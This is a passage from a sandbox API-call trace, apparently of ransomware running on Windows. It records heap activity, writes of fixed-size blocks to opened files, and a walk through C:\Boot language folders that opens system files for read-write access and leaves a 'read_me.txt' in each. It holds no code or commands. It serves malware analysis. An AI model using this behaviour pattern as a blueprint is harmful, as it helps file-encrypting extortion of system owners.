returned 0x4f10000 [0074.977] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bbc8 | out: hHeap=0x4f10000) returned 1 [0074.977] GetProcessHeap () returned 0x4f10000 [0074.977] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0074.977] GetProcessHeap () returned 0x4f10000 [0074.977] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0074.977] GetProcessHeap () returned 0x4f10000 [0074.977] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0074.977] GetProcessHeap () returned 0x4f10000 [0074.977] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0074.977] GetProcessHeap () returned 0x4f10000 [0074.977] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7cf6bf8 [0074.977] GetProcessHeap () returned 0x4f10000 [0074.977] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0074.977] GetProcessHeap () returned 0x4f10000 [0074.977] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d8f0d0 [0074.977] GetProcessHeap () returned 0x4f10000 [0074.977] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0074.977] GetProcessHeap () returned 0x4f10000 [0074.978] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7cf6bf8 [0074.978] GetProcessHeap () returned 0x4f10000 [0074.978] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d8f0d0 | out: hHeap=0x4f10000) returned 1 [0074.978] GetProcessHeap () returned 0x4f10000 [0074.978] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d8f0d0 [0074.978] GetProcessHeap () returned 0x4f10000 [0074.978] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0074.978] GetProcessHeap () returned 0x4f10000 [0074.978] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7cf6bf8 [0074.978] GetProcessHeap () returned 0x4f10000 [0074.978] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d8f0d0 | out: hHeap=0x4f10000) returned 1 [0074.978] GetProcessHeap () returned 0x4f10000 [0074.978] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d8f0d0 [0074.978] GetProcessHeap () returned 0x4f10000 [0074.978] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0074.978] GetProcessHeap () returned 0x4f10000 [0074.978] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7cf6bf8 [0074.978] GetProcessHeap () returned 0x4f10000 [0074.978] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d8f0d0 | out: hHeap=0x4f10000) returned 1 [0074.983] GetProcessHeap () returned 0x4f10000 [0074.983] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d8f0d0 [0074.983] GetProcessHeap () returned 0x4f10000 [0074.983] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0074.983] GetProcessHeap () returned 0x4f10000 [0074.983] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7cf6bf8 [0074.983] GetProcessHeap () returned 0x4f10000 [0074.983] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d8f0d0 | out: hHeap=0x4f10000) returned 1 [0074.983] GetProcessHeap () returned 0x4f10000 [0074.983] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d8f0d0 [0074.983] GetProcessHeap () returned 0x4f10000 [0074.983] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0074.983] GetProcessHeap () returned 0x4f10000 [0074.983] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7cf6bf8 [0074.983] GetProcessHeap () returned 0x4f10000 [0074.983] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d8f0d0 | out: hHeap=0x4f10000) returned 1 [0074.983] GetProcessHeap () returned 0x4f10000 [0074.983] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d8f0d0 [0074.983] GetProcessHeap () returned 0x4f10000 [0074.983] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0074.983] GetProcessHeap () returned 0x4f10000 [0074.983] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7cf6bf8 [0074.984] GetProcessHeap () returned 0x4f10000 [0074.984] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d8f0d0 | out: hHeap=0x4f10000) returned 1 [0074.984] GetProcessHeap () returned 0x4f10000 [0074.984] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7d8f0d0 [0074.984] GetProcessHeap () returned 0x4f10000 [0074.984] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0074.984] GetProcessHeap () returned 0x4f10000 [0074.984] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0074.984] GetProcessHeap () returned 0x4f10000 [0074.984] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0074.984] GetProcessHeap () returned 0x4f10000 [0074.984] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d8f0d0 | out: hHeap=0x4f10000) returned 1 [0074.984] GetProcessHeap () returned 0x4f10000 [0074.984] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0074.984] SetFilePointerEx (in: hFile=0x7b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.984] WriteFile (in: hFile=0x7b0, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x728fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x728fd44*=0x100, lpOverlapped=0x0) returned 1 [0074.984] WriteFile (in: hFile=0x7b0, lpBuffer=0x728fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x728fd44, lpOverlapped=0x0 | out: lpBuffer=0x728fd48*, lpNumberOfBytesWritten=0x728fd44*=0x4, lpOverlapped=0x0) returned 1 [0074.984] GetProcessHeap () returned 0x4f10000 [0074.984] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d738a0 | out: hHeap=0x4f10000) returned 1 [0074.984] GetProcessHeap () returned 0x4f10000 [0074.984] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d560a0 | out: hHeap=0x4f10000) returned 1 [0074.984] GetProcessHeap () returned 0x4f10000 [0074.984] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0074.984] CloseHandle (hObject=0x7b0) returned 1 [0074.986] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 2 [0074.986] GetProcessHeap () returned 0x4f10000 [0074.986] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8b00088 [0074.986] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\*") returned 19 [0074.986] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\de-DE\\*", lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x24385680, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24385680, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe928 [0074.986] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\.") returned 19 [0074.986] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x24385680, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24385680, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0074.986] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\..") returned 20 [0074.986] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0074.986] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 33 [0074.986] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0074.987] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24385680, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24385680, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24385680, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0074.987] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\read_me.txt") returned 29 [0074.987] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\de-DE\\read_me.txt" (normalized: "c:\\boot\\de-de\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a8 [0074.987] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0074.987] CloseHandle (hObject=0x7a8) returned 1 [0074.987] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24385680, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24385680, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24385680, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0074.987] FindClose (in: hFindFile=0x7cfe928 | out: hFindFile=0x7cfe928) returned 1 [0074.987] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\read_me.txt") returned 29 [0074.987] GetProcessHeap () returned 0x4f10000 [0074.987] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b00088 | out: hHeap=0x4f10000) returned 1 [0074.987] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 4 [0074.987] GetProcessHeap () returned 0x4f10000 [0074.987] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ae0078 | out: hHeap=0x4f10000) returned 1 [0074.987] GetProcessHeap () returned 0x4f10000 [0074.987] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ae0078 [0074.987] wnsprintfW (in: pszDest=0x8ae0078, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\*") returned 19 [0074.987] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\el-GR\\*", lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x24385680, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24385680, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe928 [0074.987] wnsprintfW (in: pszDest=0x8ae0078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\.") returned 19 [0074.987] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x24385680, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24385680, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0074.987] wnsprintfW (in: pszDest=0x8ae0078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\..") returned 20 [0074.987] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0074.987] wnsprintfW (in: pszDest=0x8ae0078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 33 [0074.988] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0074.988] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24385680, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24385680, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24385680, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0074.988] wnsprintfW (in: pszDest=0x8ae0078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\read_me.txt") returned 29 [0074.988] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\el-GR\\read_me.txt" (normalized: "c:\\boot\\el-gr\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a8 [0074.988] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0074.988] CloseHandle (hObject=0x7a8) returned 1 [0074.988] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24385680, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24385680, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24385680, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0074.988] FindClose (in: hFindFile=0x7cfe928 | out: hFindFile=0x7cfe928) returned 1 [0074.988] wnsprintfW (in: pszDest=0x8ae0078, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\read_me.txt") returned 29 [0074.988] GetProcessHeap () returned 0x4f10000 [0074.988] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ae0078 | out: hHeap=0x4f10000) returned 1 [0074.988] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 5 [0074.988] GetProcessHeap () returned 0x4f10000 [0074.988] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8a90050 | out: hHeap=0x4f10000) returned 1 [0074.988] GetProcessHeap () returned 0x4f10000 [0074.988] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8a90050 [0074.988] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\*") returned 19 [0074.988] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\en-US\\*", lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x2441dc00, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x2441dc00, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe928 [0074.988] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\.") returned 19 [0074.988] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x2441dc00, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x2441dc00, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0074.988] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\..") returned 20 [0074.988] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0074.989] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\bootmgr.exe.mui") returned 33 [0074.989] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0074.989] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0074.989] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\memtest.exe.mui") returned 33 [0074.989] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0074.989] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2441dc00, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x2441dc00, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x2441dc00, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0074.989] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\read_me.txt") returned 29 [0074.989] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\en-US\\read_me.txt" (normalized: "c:\\boot\\en-us\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a8 [0074.989] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0074.989] CloseHandle (hObject=0x7a8) returned 1 [0074.989] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2441dc00, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x2441dc00, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x2441dc00, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0074.989] FindClose (in: hFindFile=0x7cfe928 | out: hFindFile=0x7cfe928) returned 1 [0074.989] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\read_me.txt") returned 29 [0074.989] GetProcessHeap () returned 0x4f10000 [0074.989] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8a90050 | out: hHeap=0x4f10000) returned 1 [0074.989] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 6 [0074.989] GetProcessHeap () returned 0x4f10000 [0074.989] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ad0070 | out: hHeap=0x4f10000) returned 1 [0074.989] GetProcessHeap () returned 0x4f10000 [0074.989] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8a90050 [0074.989] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\es-ES\\*") returned 19 [0074.989] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\es-ES\\*", lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe928 [0074.990] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\es-ES\\.") returned 19 [0074.990] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0074.990] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\es-ES\\..") returned 20 [0074.990] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0074.990] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\es-ES\\bootmgr.exe.mui") returned 33 [0074.990] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), 